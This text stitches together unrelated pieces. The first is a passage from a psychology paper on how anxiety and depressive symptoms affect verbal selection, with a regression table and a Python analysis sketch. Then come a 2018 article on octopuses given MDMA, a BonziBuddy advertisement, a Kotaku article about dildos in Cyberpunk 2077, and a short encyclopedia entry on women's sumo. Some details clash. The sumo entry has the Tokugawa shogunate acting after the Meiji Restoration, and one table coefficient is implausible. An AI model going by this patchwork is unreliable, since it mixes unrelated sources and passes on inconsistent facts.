anxiety disorders have worse performance on some EF tasks than individuals with either depressive or anxiety disorders alone (e.g., Basso et al., 2007). However, anxiety and depression are also associated with distinct profiles of symptoms and neurobiology: current clinical models and empirical evidence generally agree that whereas anxiety and depression are related constructs with some shared aspects, they are nonetheless distinct, with aspects that are unique to each (e.g., for review see Moffitt et al., 2007). In fact, some evidence suggests that they can have opposing effects on brain and behavior, such as the finding that anxiety symptoms were associated with a greater visual attentional bias towards the right hemisphere (left visual field), and depressive symptoms with greater bias towards the left hemisphere (Keller et al., 2000). 
These asymmetries only became apparent when controlling for the variance in common between anxiety and depressive symptoms (Keller et al., 2000). Similarly, anxiety and depressive symptoms were associated with opposing patterns of activity in several brain regions during an emotional Stroop task (although there were no behavioral differences; Engels et al., 2007). Finally, participants with social anxiety disorder alone generally had reduced performance on EF tasks under social stress compared to non-stress baseline, whereas those with comorbid social anxiety and depression generally improved their performance under social stress, although the performance of the comorbid group was never significantly better than that of the social anxiety only group (Graver & White, 2007). Given these distinct mechanisms and effects, it is possible that in some cases anxiety and depressive symptoms could have opposing effects. That is, the neurobiological changes associated with these symptoms could have countervailing effects on specific aspects of EF, such that one is associated with impaired performance, and the other with improved performance. To our knowledge this has never been demonstrated. We examine this issue in the context of the ability to select among competing options, an aspect of EF that is critical for language and decision-making. We assess selection across three different tasks to generate a robust composite measure. Composite scores that aggregate results across multiple tasks provide a more accurate and reliable measure of the intended EF than single tasks, because the non-executive task requirements specific to each task (e.g., visual processing of pictures in blocked cyclic naming vs. sentence reading in the sentence completion task) have less influence (e.g., Miyake et al., 2000). The current study aims to (a) extend the previous finding that anxiety symptoms are associated with impaired selection (Snyder et al., 2010) to this more reliable composite measure and to individuals with clinically relevant levels of anxiety, and (b) test the specificity of selection deficits to anxiety, namely, the possibility that anxiety and depressive symptoms may have opposing effects. Method Participants Participants were 162 native English-speaking young adult undergraduate students from the University of Colorado Boulder (71% female). We used an extreme group design, which allowed us not only to evaluate the association between impaired selection and clinically significant levels of anxiety, but given the expected linear effect of anxiety (Snyder et al., 2010) also provides a more optimized or powerful test of the association between selection and anxiety (McClelland, 1997). Participants were selected based on Penn State Worry Questionnaire scores (PSWQ, Meyer, Miller, Metzger, & Borkovec, 1990), a 16-item scale evaluating symptoms of anxious apprehension. Participants scoring in the top (>48, n = 116) and bottom (<34, n = 46) quartiles (Gillis, Haaga, & Ford, 1995) were included in the current study. The distribution of PSWQ scores for the students completing the pre-screening process closely matched previously published norms (e.g., Gillis et al., 1995). The top quartile score we used for classifying participants into the high anxiety subsample is slightly higher than the cut score recommended for screening for generalized anxiety disorder (Behar, Alcaine, Zuellig & Borkovec, 2003). 
Depressive symptoms were assessed with the Beck Depression Inventory – Second Edition (BDI-II, Beck, Steer, & Brown, 1996), a 21-item scale evaluating current symptoms of depression. Participants gave informed consent, were treated in accordance with procedures approved by the University of Colorado Boulder Institutional Review Board, and were compensated with course credit or $15. Materials and Procedure Trained research assistants tested participants individually in a quite room in a one-hour session. Participants completed three tasks that assessed verbal selection abilities to yield a composite score: verb generation (e.g., Snyder et al., 2010), blocked cyclic naming (e.g., Schnur, Schwartz, Brecher, & Hodgson, 2006) and sentence completion (e.g., Snyder & Munakata, 2008). In each, reaction times (RT) were recorded using a voice-activated microphone. Responses were also audio-recorded and transcribed to remove error trials. In addition, participants completed measures that allowed us to statistically control for psychomotor speed and IQ. Verb generation Verb generation was administered as in Snyder et al. (2010). Stimuli were 25 nouns in two conditions: high competition with many possible verb responses (e.g., cat, associated with purr, lick, meow, etc.) and low competition with few possible verb responses (e.g., scissors, associated with cut). Participants saw nouns one at a time and stated the first verb that came to mind (something the noun does or something that could be done with the noun). Data were excluded for 10 participants due to failure to follow task directions (>25% errors, leaving too few valid trials for accurate RT analysis), and data were missing from one participant due to equipment failure. Blocked cyclic naming Participants repeatedly named 16 pictures as quickly as possible in two conditions: homogenous blocks of pictures from the same category (e.g., bed, table, bench, crib), and mixed blocks with each picture from a different category (e.g., lion, pajamas, bench, car). The homogenous condition creates high competition among responses due to spreading semantic activation, whereas the mixed condition has low competition (e.g., Schnur et al., 2006). Participants completed eight blocks, each with four pictures repeated six times in different orders. The same pictures appeared in both conditions. Data were missing for one participant due to equipment failure. Sentence completion Sentence completion was administered as in Snyder and Munakata (2008). Stimuli were sentences with the final word omitted, with 50 sentences each in two conditions: high competition with many possible endings (e.g., There is something grand about the _____.), and low competition with few possible endings (e.g., He mailed the letter without a______.). Participants read sentences silently as they appeared in segments of 1–2 words (to control reading speed) then said a word aloud to complete the sentence. The final segment always contained one word and the blank. Data were missing for one participant due to equipment failure. North American Adult Reading Test (NAART) The NAART is a well-established IQ estimate (Uttl, 2002). Participants read 60 irregular words aloud, which increased in difficulty (e.g., debt to synecdoche). Estimated full scale IQ was calculated from the number of incorrect pronunciations (Uttl, 2002). One participant did not complete the NAART due to experimenter error. 
Choice RT Participants pressed buttons with their left and right hands as fast as possible when presented with left or right pointing triangles. Data were missing for three participants due to equipment failure, and one participant did not complete Choice RT due to experimenter error. Data Analysis Data were transformed and dependent variables calculated as in previous research (e.g., Snyder et al., 2010). Incorrect responses (e.g., non-verbs in verb generation) and microphone errors (e.g., failing to trigger) were excluded. Trials with RTs <200 ms, >10,000 ms, or greater than three standard deviations above the participant’s mean RT, were trimmed (excluded from analysis). RTs were log transformed to remove skew and z-transformed within subjects to remove baseline differences in RT. For the verb generation, blocked cyclic naming, and sentence completion tasks, selection cost was calculated as the z RT difference between the high competition and low competition conditions. Selection costs for each task were z-transformed across subjects (to put them on the same scale and thus give them equal weight in the composite score) and averaged into the primary measure of interest, the selection composite score. To provide a full picture of the effects of anxiety and depressive symptoms separately as well as effects of those aspects of anxiety and depression that are unique to each (controlling for the other variable), data were analyzed with regression analyses testing the effects on selection composite scores (and on selection cost for each task) of (1) PSWQ scores, (2) BDI-II scores, (3) PSWQ and BDI-II scores simultaneously, and (4) PSWQ and BDI-II scores controlling for NAART and choice RT. Outliers were excluded using the standard cut-off of standardized DfBeta > 2/√n. Results Participant Characteristics Overall, the average PSWQ score was 52.15, SD = 17.61, range 16–80, and the average BDI-II score was 11.44, SD = 9.93, range 0–46. PSWQ and BDI-II scores were correlated, r = .56, p < .001, n = 162, consistent with previous studies (e.g., Stöber & Joormann, 2001), and below commonly accepted cut-offs above which collinearity is considered a potential concern in multiple regression (e.g., O’Brien, 2007). The mean PSWQ score for the high anxiety subsample was 62.21, SD = 8.15, range 49–80, above the 90th percentile (Gillis et al., 1995) and similar to levels reported for participants with anxiety disorders (e.g., Behar et al., 2003). The mean BDI-II score for the high anxiety subsample was 14.34, SD = 10.21, range 0–46, with 47% in the dysphoric to dysphoric/depressed range using the criteria of Dozois, Dobson, and Ahnberg (1998). Thus, although the high anxiety subsample was not clinically diagnosed, their average self-reported levels of anxiety and depressive symptoms are likely of clinical significance. Moreover, there was a wide range of depressive symptoms. Thus, restriction of range was not a concern in analyzing the effects of depressive symptoms in the high anxiety subsample. IQ estimates on the NAART were in the average range, mean = 107.12, SD = 6.10, range 92–122, and the high anxiety subsample had nearly identical IQ scores, mean = 107.28, SD = 6.06, range 94–121. All participants had IQs in the normal range or above (>90) Selection Regression analyses are reported in . Models 1 and 2 respectively tested the separate effects of anxiety and depressive symptoms. 
For the primary measure of interest, selection composite scores, there was a significant effect of anxiety, such that as anxiety symptoms (PSWQ) increased, so did selection costs (i.e., performance decreased), β = 0.28, p = .001, but there was no significant effect of depressive symptoms (BDI-II), β = −0.02, p = .83 (Footnote 1). The key model of interest, Model 3, included both anxiety and depressive symptoms, and thus tested the effects of anxiety controlling for depression and depression controlling for anxiety. For the primary measure of interest, selection composite scores, there were significant effects of both anxiety and depressive symptoms. Controlling for level of depressive symptoms (BDI-II), as anxiety symptoms (PSWQ) increased, so did selection costs (i.e., performance decreased), β = 0.43, p < .001. However, after removing the variance associated with anxiety, the effects of depression were in the opposite direction: controlling for anxiety symptoms, as depressive symptoms increased, selection costs decreased (i.e., performance increased), β = −0.28, p = .007 (Footnote 2). This suggests that it is the variance in depressive symptoms that is not shared in common with anxiety symptoms that predicts improved selection. Importantly, these effects remained significant in the high anxiety subsample. That is, among participants with clinically significant levels of anxiety, those with more severe depressive symptoms had smaller selection costs, β = −0.29, p = .012. Moreover, even within the restricted range of anxiety levels in the high anxiety subsample, higher levels of anxiety symptoms still predicted increased selection costs when controlling for depressive symptoms, β = 0.25, p = .026.

Table 1. Regression analyses predicting selection costs.

Selection Composite
  Model 1 (R² = .080, model p = .001): PSWQ β = 0.282*, t = 3.44, p = .001
  Model 2 (R² = .000, model p = .829): BDI-II β = −0.018, t = −0.22, p = .829
  Model 3 (R² = .122, model p < .001): PSWQ β = 0.431*, t = 4.25, p < .001; BDI-II β = −0.280*, t = −2.76, p = .007
  Model 4 (R² = .124, model p = .002): PSWQ β = 0.439*, t = 4.26, p < .001; BDI-II β = −0.283*, t = −2.77, p = .006; IQ β = 0.025, t = 0.30, p = .765; Choice RT β = −0.035, t = −0.41, p = .682

Selection Composite, High Anxiety Subsample
  Model 1 (R² = .014, model p = .248): PSWQ β = 0.119, t = 1.16, p = .248
  Model 2 (R² = .028, model p = .101): BDI-II β = −0.167, t = −1.66, p = .101
  Model 3 (R² = .078, model p = .022): PSWQ β = 0.254*, t = 2.26, p = .026; BDI-II β = −0.287*, t = −2.56, p = .012
  Model 4 (R² = .084, model p = .087): PSWQ β = 0.277*, t = 2.36, p = .021; BDI-II β = −0.298*, t = −2.61, p = .010; IQ β = 0.700, t = 0.66, p = .508; Choice RT β = −0.023, t = −0.23, p = .819

Sentence Completion
  Model 1 (R² = .029, model p = .045): PSWQ β = 0.169*, t = 2.02, p = .045
  Model 2 (R² = .001, model p = .792): BDI-II β = −0.022, t = −0.27, p = .792
  Model 3 (R² = .052, model p = .026): PSWQ β = 0.260*, t = 2.48, p = .014; BDI-II β = −0.186#, t = −1.74, p = .085
  Model 4 (R² = .067, model p = .057): PSWQ β = 0.276*, t = 2.64, p = .009; BDI-II β = −0.186#, t = −1.75, p = .082; IQ β = 0.083, t = 0.95, p = .345; Choice RT β = −0.108, t = −1.23, p = .222

Verb Generation
  Model 1 (R² = .022, model p = .087): PSWQ β = 0.150#, t = 1.72, p = .087
  Model 2 (R² = .000, model p = .918): BDI-II β = 0.009, t = 0.10, p = .918
  Model 3 (R² = .033, model p = .126): PSWQ β = 0.229*, t = 2.05, p = .043; BDI-II β = −0.128, t = −1.14, p = .255
  Model 4 (R² = .035, model p = .4): PSWQ β = 0.233*, t = 2.05, p = .042; BDI-II β = −0.131, t = −1.16, p = .248; IQ β = 0.460, t = 0.49, p = .624; Choice RT β = 0.022, t = 0.24, p = .814

Blocked Cyclic Naming
  Model 1 (R² = .067, model p = .002): PSWQ β = 0.259*, t = 3.09, p = .002
  Model 2 (R² = .000, model p = .981): BDI-II β = 0.002, t = 0.02, p = .981
  Model 3 (R² = .079, model p = .004): PSWQ β = 0.341*, t = 3.25, p = .001; BDI-II β = −0.137, t = −1.31, p = .194
  Model 4 (R² = .117, model p = .003): PSWQ β = 0.303*, t = 2.89, p = .004; BDI-II β = −0.122, t = −1.18, p = .242; IQ β = −0.023, t = −0.28, p = .784; Choice RT β = 0.191*, t = 2.22, p = .028

Controlling for choice RT and IQ in the regression analyses did not alter any of the results, and choice RT and IQ did not significantly correlate with PSWQ or BDI-II scores (Model 4, ps > .15).
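For readers who want to see the shape of the analysis, the following is a hedged sketch (in Python with pandas and statsmodels, not the authors' own code) of how a selection-cost composite and the simultaneous regression of Model 3 could be computed; the column names are assumptions for illustration only.

```python
# Assumes a trial-level DataFrame with columns: subject, task, condition ('high'/'low'),
# rt_ms, and a subject-level DataFrame with columns: selection, pswq, bdi.

import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

def selection_composite(trials: pd.DataFrame) -> pd.Series:
    t = trials.copy()
    t["log_rt"] = np.log(t["rt_ms"])
    # z-score log RT within subject to remove baseline speed differences
    t["z_rt"] = t.groupby("subject")["log_rt"].transform(lambda x: (x - x.mean()) / x.std())
    # selection cost = high-competition minus low-competition mean z RT, per subject and task
    cost = (t.pivot_table(index=["subject", "task"], columns="condition", values="z_rt")
              .eval("high - low")
              .unstack("task"))
    # z-score each task's cost across subjects, then average into the composite
    return cost.apply(lambda col: (col - col.mean()) / col.std()).mean(axis=1)

def fit_model3(subjects: pd.DataFrame):
    # Both symptom measures entered simultaneously, as in Model 3
    return smf.ols("selection ~ pswq + bdi", data=subjects).fit()
```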
Finally, we also ran regression analyses testing for an interaction between anxiety and depressive symptoms; however, the interaction was not significant for the composite measure (p = .83) or any individual task (ps > .23), so we report only main effect analyses. Discussion The current study demonstrates that anxiety is associated with impaired selection, supporting our earlier finding in a non-selected sample (Snyder et al., 2010), and extending it to people with more highly elevated anxiety symptoms and to additional tasks measuring verbal selection. Furthermore, the use of an extreme group design in the current study provided a more efficient and statistically powerful test of the association between verbal selection and anxiety relative to the use of an unselected, random sample (McClelland, 1997). Because the current study used selected high and low anxiety groups, conclusions about the linearity of this effect across the middle range of anxiety symptom levels cannot be drawn; however, taken together with the earlier study, these results suggest that verbal selection deficits are significantly and positively associated with anxiety, including clinically significant levels of anxiety symptoms. These findings are consistent with our model, which posits that reduced neural inhibition associated with anxiety leads to an impaired ability to resolve competition among response options (Snyder et al., 2010). Although the current results demonstrate selection impairments in language production tasks, it is possible that difficulty selecting among competing representations could also play a role in indecisiveness, procrastination, and intolerance of uncertainly associated with anxiety, due to the difficulty of selecting appropriate courses of action and outcome representations. Understanding the core EF deficits involved in these phenomena is important because problems making decisions can interfere with the ability to achieve major life goals, whereas intolerance of uncertainty leads to avoiding many potentially positive experiences, and may promote the maintenance or increase of anxiety (e.g., Chen & Hong, 2010). Future research is needed to determine whether impaired selection on simple non-affective tasks, such as language production tasks, predicts indecisiveness, procrastination, and intolerance of uncertainty, beyond what is predicted by anxiety alone, and what causal role this may play in the development or maintenance of anxiety. Counterintuitively, the current study found that the unique aspect of depressive symptoms that is not shared with anxiety (i.e., controlling for anxiety) is associated with better selection, as indexed by a composite measure of three verbal selection tasks. This finding is in contrast to theories suggesting that anxiety and depression additively contribute to EF deficits (e.g., Basso et al., 2007), but is in accord with previous evidence for opposite changes in brain and behavior associated with anxiety and depressive symptoms in other domains (e.g., Keller et al., 2000). The current study shows for the first time that anxiety and depressive symptoms have opposite effects on one aspect of EF: verbal selection among competing options. Importantly, these effects also held true for the subsample of participants with clinically significant levels of anxiety, suggesting that the results may generalize to individuals with clinically elevated levels of anxiety with and without co-occurring depression. 
Although the current study cannot directly address the reasons for this effect, one intriguing possibility is that anxiety and depression may be related to opposing changes in neural activity in prefrontal areas critical for EF. Specifically, whereas anxiety is associated with reduced function of the major inhibitory neurotransmitter GABA (e.g., for review see Kalueff & Nutt, 2007), depression is associated with reduced function of the major excitatory neurotransmitter glutamate (e.g., for review, see Yüksel & Ongur, 2010) (Footnote 3). Neural network simulations and our previous empirical research have demonstrated how GABAergic interneurons in prefrontal circuits can play a key role in selection, by allowing one representation to more quickly win out over competing options (Snyder et al., 2010). Our preliminary extensions to these neural network simulations suggest that reduced glutamatergic function can improve selection by reducing activation of competing responses. Thus, reduced glutamate associated with increasing depressive symptoms could counteract the effects of reduced GABA associated with increasing anxiety symptoms, leading to improvements in selection. This theory makes testable predictions: for example, depressive symptoms should improve performance only on tasks requiring competitive inhibition, such as selection, and should harm performance on tasks requiring neural excitation, such as working memory maintenance. This prediction is consistent with findings that working memory and active maintenance of task goals are impaired in individuals with depressive disorders (e.g., Snyder, 2013). Future research is needed to further test this prediction by carefully differentiating the effects of anxiety and depressive symptoms on different aspects of EF. One alternative possibility is that individuals with elevated depressive symptoms who are able to cope with their depression effectively enough to attend college might have better pre-existing cognitive function, which both allows them to attend college despite their depression and to do well on selection tasks. However, depressive symptoms did not predict performance on IQ or psychomotor speed tasks, suggesting the groups did not differ in general intellectual function or motivation. Nonetheless, the possibility cannot be ruled out that college students with elevated depressive symptoms are self-selected for high EF in particular. Future research with community samples can address this question. In sum, we confirm that anxiety is associated with a robust and specific impairment in verbal selection among competing options, while adding the novel finding that depressive symptoms may have opposite effects. This counterintuitive effect could potentially explain mixed evidence for EF deficits associated with anxiety (Castaneda et al., 2008), because previous studies may have varied in the levels of co-occurring depressive symptoms, as well as the sensitivity of their tasks to the effects of depression. Our results emphasize the need to control for co-occurrence and consider the ways that anxiety and depression may differentially affect EF. Further, our results suggest that specific neural mechanisms associated with individual EF processes may be affected differently by anxiety and depression. Future research is needed to investigate these mechanisms and explore the implications for understanding and ameliorating impairments in daily functioning associated with these common mental health problems. 
Acknowledgments
This research was supported by grants from the National Institutes of Health (P50-MH079485, F31-MH087073). We thank Bidita Dutta and David Story for assistance with data collection and members of the P50 center on Executive Function and Dysfunction for valuable discussions.

Footnotes
1. The same pattern holds for all individual tasks: The effect of anxiety alone is significant or marginal for all tasks, whereas the effect of depressive symptoms alone is non-significant and near zero (see Table 1).
2. For the individual tasks, anxiety symptoms significantly predicted increased selection costs for all tasks, whereas the effects of depressive symptoms were in the same direction as the composite measure, but did not reach significance (see Table 1).
3. Reduced GABA is also found in depressed patients, who nearly always also have high anxiety (e.g., Kalueff & Nutt, 2007), but reduced glutamate is not associated with anxiety (Phan et al., 2005).

References
Basso MR, Lowery N, Ghormley C, Combs D, Purdie R, Bornstein R. Comorbid anxiety corresponds with neuropsychological dysfunction in unipolar depression.
Beck AT, Steer RA, Brown GK. Manual for the Beck Depression Inventory. 2nd ed. San Antonio, TX: The Psychological Corporation; 1996.
Behar E, Alcaine O, Zuellig AR, Borkovec TD. Screening for generalized anxiety disorder using the Penn State Worry Questionnaire: A receiver operating characteristic analysis.
Chen CY, Hong RY. Intolerance of uncertainty moderates the relation between negative life events and anxiety.
Dozois DJA, Dobson KS, Ahnberg JL. A psychometric evaluation of the Beck Depression Inventory–II.
Engels AS, Heller W, Mohanty A, Herrington J, Banich MT, Webb A, Miller GA. Specificity of regional brain activity in anxiety types during emotion processing.
Gillis MM, Haaga DAF, Ford GT. Normative values of the Beck Anxiety Inventory, Fear Questionnaire, Penn State Worry Questionnaire, and Social Phobia and Anxiety Inventory.
Graver CJ, White PM. Neuropsychological effects of stress on social phobia with and without comorbid depression.
Kalueff AV, Nutt DJ. Role of GABA in anxiety and depression.
Keller J, Nitschke J, Bhargava T, Deldin PJ, Gergen J, Miller GA, Heller W. Neuropsychological differentiation of depression and anxiety.
McClelland GH. Optimal design in psychological research.
Meyer TJ, Miller ML, Metzger RL, Borkovec TD. Development and validation of the Penn State Worry Questionnaire.
Miyake A, Friedman NP, Emerson MJ, Witzki AH, Howerter A, Wager TD. The unity and diversity of executive functions and their contributions to complex “frontal lobe” tasks: A latent variable analysis.
Moffitt TE, Harrington H, Caspi A, Kim-Cohen J, Goldberg D, Gregory AM, Poulton R. Depression and generalized anxiety disorder: Cumulative and sequential comorbidity in a birth cohort followed prospectively to age 32 years.
O’Brien RM. A caution regarding rules of thumb for variance inflation factors.
Phan KL, Fitzgerald DA, Cortese BM, Seraji-Bozorgzad N, Tancer ME, Moore GJ. Anterior cingulate neurochemistry in social anxiety disorder: 1H-MRS at 4 Tesla.
Rassin E, Muris P, Franken I, Smit M, Wong M. Measuring general indecisiveness.
Rivas-Vazquez RA, Saffa-Biller D, Ruiz I, Blais MA, Rivas-Vazquez A. Current issues in anxiety and depression: Comorbid, mixed, and subthreshold disorders.
Schnur TT, Schwartz MF, Brecher A, Hodgson C. Semantic interference during blocked-cyclic naming: Evidence from aphasia.
Snyder HR. Major depressive disorder is associated with broad impairments on neuropsychological measures of executive function: A meta-analysis and review.
Snyder HR, Hutchison N, Nyhus E, Curran T, Banich MT, O’Reilly RC, Munakata Y. Neural inhibition enables selection during language processing.
Snyder HR, Munakata Y. So many options, so little time: The roles of association and competition in underdetermined responding.
Stöber J, Joormann J. Worry, procrastination, and perfectionism: Differentiating amount of worry, pathological worry, anxiety, and depression. 2001;25:49–60.
Uttl B. North American Adult Reading Test: Age norms, reliability, and validity.
Yüksel C, Ongur D. Magnetic resonance spectroscopy studies of glutamate-related abnormalities in mood disorders.
1
What Ecstasy Does to Octopuses(2018)
When Gül Dölen first gave ecstasy to octopuses, she didn’t know what to expect. Dölen is a neuroscientist at the Johns Hopkins School of Medicine who studies how the cells and chemicals in animal brains influence animals’ social lives. Ecstasy, also known as MDMA, interests her because it’s known to make people feel more sociable, more interested in others, and less defensive. The same effects also occur in rats and mice—the animals that Dölen usually studies. But octopuses are very different creatures. They’re clearly intelligent and their behavior is undoubtedly sophisticated, but their brains have a completely different architecture than those of mammals—for one thing, they’re shaped like donuts. “It’s organized much more like a snail’s brain than ours,” Dölen says. With such a dissimilar anatomy, she wondered whether these animals would respond to drugs in unpredictable ways. And to find out, she needed a way of assessing how sociable an octopus is. She and her colleague Eric Edsinger put five Californian two-spot octopuses individually into the middle of three connected chambers and gave them free rein to explore. One of the adjacent chambers housed a second octopus, confined inside an overturned plastic basket. The other contained an unfamiliar object, such as a plastic flower or a Chewbacca figurine. Dölen and Edsinger measured how long the main animal spent in the company of its peer, and how long with the random toy. This is exactly the kind of setup that neuroscientists use to test social behavior in mice, but Dölen had no idea whether it would work with octopuses. “It might be that they are so smart that the kind of task we’d use for a mouse would be boring to them,” she says. “Maybe they’d take one lap around the chambers and stop.” Fortunately, that wasn’t the case. The free-moving individuals thoroughly explored the chambers, and from their movements, Dölen realized that individuals of any sex gravitate toward females, but avoid males. Next, she dosed the animals with ecstasy. Again, there’s no precedent for this, but researchers often anesthetize octopuses by dunking them in ethanol—a humane procedure with no lasting side effects. So Dölen and Edsinger submerged their octopuses in an MDMA solution, allowing them to absorb the drug through their gills. At first they used too high a dose, and the animals “freaked out and did all these color changes,” Dölen says. But once the team found a more suitable dose, the animals behaved more calmly—and more sociably. With ecstasy in their system, the five octopuses spent far more time in the company of the same trapped male they once shunned. Even without a stopwatch, the change was obvious. Before the drug, they explored the chamber with the other octopus very tentatively. “They mashed themselves against one wall, very slowly extended one arm, touched the [other animal], and went back to the other side,” Dölen says. “But when they had MDMA, they had this very relaxed posture. They floated around, they wrapped their arms around the chamber, and they interacted with the other octopus in a much more fluid and generous way. They even exposed their [underside], where their mouth is, which is not something octopuses usually do.” But most octopuses, with some exceptions, are solitary hermits, and Jennifer Mather from the University of Lethbridge isn’t convinced that ecstasy is making them sociable. Instead, the drug might just mess with their ability to detect the chemical cues of potential mates. 
“There’s no proof that it is anything more than attraction,” she says. Harriet de Wit from the University of Chicago, who has studied ecstasy’s effects on animals, has other concerns. “It’s an innovative and exciting study,” she says, but it’s unfortunate that the duo always tested the octopuses first after a dunk in normal salt water and then after an ecstasy bath. In pharmacology studies, scientists normally mix up the order in which animals receive the drug and the saline control. Without that counterbalancing, it’s hard to say why the octopuses were behaving differently the second time around: Was it because of the ecstasy, or simply because they had become familiar with the arena, the plastic toy, or the other octopus? Dölen admits that the study is just a pilot, and one with a very small sample size. “We would obviously want other people to try and repeat it in a much larger group of animals,” she says. “But we wanted to publish it, because there really aren’t established protocols for delivering drugs to octopuses or doing social tests with them.” She hopes that her findings will encourage more neuroscientists to study these beguiling animals. She’s not the first to make such a call, either. In 1964, the English zoologist J. Z. Young wrote a book called A Model of the Brain, in which he encouraged scientists to study the brains of a wide variety of species, octopuses included. “We could say the octopus brain is totally different to a human one, but we need this synapse or this neurotransmitter,” Dölen says. “We could write down a list of these minimal building blocks of complex behavior.” And that’s what she and Edsinger have started doing. They knew that ecstasy works by causing neurons to release serotonin, a signaling chemical that affects our mood. The drug does that by sticking to a protein called the serotonin transporter, or SERT, which neurons normally use to suck up the chemical. Ecstasy’s presence reverses that flow, creating a massive, mood-altering dump of serotonin. Octopuses have their own version of SERT, and Dölen and Edsinger showed that it’s just a 50 percent match to ours. Despite these differences, the specific bit of the protein that sticks to ecstasy is almost identical in both species, which is why the drug affects both. “We weren’t expecting it to have quite so much overlap,” Dölen says. “Octopuses really are the best example we have on Earth of a second intelligence,” says Robyn Crook, a neuroscientist from San Francisco State University. We last shared a common ancestor with them around 800 million years ago, and their brains have evolved independently from ours. And yet Dölen’s study showed that our brains have a few extreme similarities, from the molecular level to the behavioral one. It strengthens the idea, Crook says, that “there are only so many ways to make an intelligent brain.”
13
BonziBuddy
p Take a minute... and make a friend for life! Download BonziBUDDY Now - FREE! (NOTE: This is computer software! He actually learns from you!) Welcome to the world of Bonzi BUDDY! He will explore the Internet with you as your very own friend and sidekick!  He can talk, walk, joke, browse, search, e-mail, and download like no other friend you've ever had!  He even has the ability to compare prices on the products you love and help you save money! Best of all, he's FREE! He will learn from you! Once he knows your likes and interest he will search the world and find you new sites you have not yet discovered or traveled to! He can kiss and hug friends and loved ones all over the world on your behalf! He will deliver the message himself and even talk and express emotions for you! He will handle all of your Internet file downloads for you! He will even allow you to continue browsing the Internet while he takes care of your download! He will notify you when he is done! He can keep you on schedule. He will track your appointments and tasks with his built-in calendar! He is never late for an appointment! Keeps you informed of late breaking news! He organizes the Internet the way you want it! He will make you smile throughout your day with his little gorilla personality! He can educate people of all ages with his wealth of knowledge and trivia! He makes your computer and the Internet easier, safer, and definitely more fun! He has the ability to save you money! He will search the Internet for the best price on the products you love! Download a 'Best Friend' Now -- FREE! For a limited time, you may download your own BonziBUDDY -- FREE! BonziBUDDY normally retails for $40.00, but for a limited time, we'd like to say "Thanks!" just for visiting BONZI.COM! Download BonziBUDDY Now - FREE! System Requirements: 16MB of RAM, 11MB of Free Disk Space. Windows 9x, NT 4, ME, Win2000 Sound Card. Microsoft IE (Internet Explorer) 5.0 or above. Copyright © 1995 - 2000 BONZI.COM Software Windows, Microsoft Internet Explorer, and Microsoft are registered trademarks of Microsoft Corporation.   BonziBUDDY and BONZI are trademarks of BONZI.COM Software. All rights and liabilities with respect to BonziBUDDY  belong solely to BONZI.COM Software. BonziBUDDY uses Microsoft Agent Technology.  Copyright © 1995 - 2000 - All Rights Reserved.
21
CD Projekt Is Adjusting Cyberpunk 2077's 'Distracting' Amount of Dildos
By Nathan Grayson, Published December 15, 2020

The first time I stepped out of my character’s apartment in Cyberpunk 2077, I expected to be greeted by a vast world of machine-powered possibility. Instead, I found a dildo. It was sitting next to a random NPC’s foot in my apartment building, near a discarded magazine and some other trash. “That’s weird,” I thought. Then I looked up and saw two additional dildos perched on a nearby bannister, positioned between two conversing NPCs who did not seem to be aware of their presence. “That, too, is weird,” I thought. (Warning: This post contains imagery that might be considered NSFW, but with many of us working from home during the pandemic, what does NSFW even mean anymore, really?) In my time with Cyberpunk since, I have stumbled across many, many, many more dildos. I’ve taken to documenting every single one I come across. I have screenshotted 29 dildos. They come in two main varieties: the common “studded dildo,” the lowly street pigeon of Cyberpunk 2077's vast dildo underground, and the rarer “Pilomancer 3000,” a utensil of truly formidable size and girth. You can pick them up and either turn them into crafting parts or sell them for a few bucks. They have no use beyond this. Some have been in sex shops and clubs—places where dildos don’t seem so out of place. Others have been on street corners, in restaurants, in chop shops where human beings get disassembled for parts, and of course, scattered amongst garbage, which is pretty much everywhere. This is distracting! First off, if you create a world that in many ways resembles our own but with significantly greater dildo density, people are going to have questions. But also, I have yet to witness anybody in Cyberpunk actually use a dildo, even in a sex scene between two women. There is an unlockable dildo weapon, but it’s disconnected from the wider plethora of dildos in the game. And while something like that might fit in, say, a Saints Row game, Cyberpunk’s overall tone is much darker, even if some side-quests are humorous and over the top. So I had to know: Why all the dildos, CD Projekt Red? Why? “We wanted Night City to be pretty open sexually,” said senior quest designer Philipp Weber in an email to Kotaku, “where something by today’s standards might be taboo or kinky is very normal and commonplace by 2077 standards.” But just scattering dildos everywhere is an odd way to convey that, especially without much else to directly communicate this larger cultural shift or tie it back to the conspicuous presence of ding dang dildos all over the ding dang place. Yes, sex workers play a large role in Cyberpunk’s story, and it’s not difficult to find them in various portions of Night City, but the game hiccups when it comes to linking this to believable human behavior. There is no reason to believe that sexual liberation would naturally result in people leaving dildos everywhere, especially in light of sanitary concerns and other practical matters. Are these disposable dildos? If not, who in this demonstrably impoverished world can afford to spend so much money on dildos that they ultimately just drop on the ground? It feels, as with many other elements of Cyberpunk 2077's worldbuilding, like a half-finished thought—an idea that must be explained, rather than one that explains itself. 
Meanwhile, the game does little to unravel more fundamental questions about its relationship to sex, like the fact that sex work is generally much more accepted and seemingly legal in Night City than it is in our world, yet it is for some reason still intrinsically linked to crime. Going forward, CD Projekt will not be removing Night City’s preponderance of discarded dildos. Instead, the developer will fine-tune its flock of wayward phalli. “The second reason for the high amount of dildos in the world is because they can spawn as random loot, and we were still tweaking those settings, so especially during the early reviews, the amount of dildos in the game world was pretty high. We’re going to adjust them so that the dildos don’t appear too out of place/context and distracting and more where they should be by design,” Weber said, also noting that a recent hotfix “may” have already adjusted dildo density to an extent. So, at the very least, the dildos probably won’t stand out quite so much anymore. They’ll still be present, though, as will the dildo melee weapon, and of course, we’ll always have our memories of the halcyon days of Cyberpunk’s dildo dystopia.
1
Women's Sumo
Women's sumo wrestling (Japanese: 女相撲, Hepburn: onna-zumō) is a form of sumo performed by women. Professional sumo traditionally forbids women from competition and ceremonies; women are not allowed to enter or touch the sumo wrestling ring (dohyō). [1] Despite this, women sumo wrestlers have existed through history and exist in the present day on an amateur level.

The first recorded instance of women performing sumo, according to the Nihon Shoki, is when Emperor Yuryaku (418–479) summoned two courtesans and ordered them to wear loincloths and sumo wrestle. Women's sumo would not become common until the 18th century, in the middle of the Edo period (1603–1868), when a form of it was performed in some areas of Japan. Various types of women's sumo existed, including touring professionals. These continued to exist after the Meiji Restoration, [2] until women's sumo was cracked down upon by the Tokugawa shogunate and Meiji government, which deemed its organizers to be corrupting public morals with these spectacles. [3] Women's sumo continued to exist despite a government ban in 1926. [2] The practice died out only after the end of World War II, with the last group dissolving in 1963. [4]

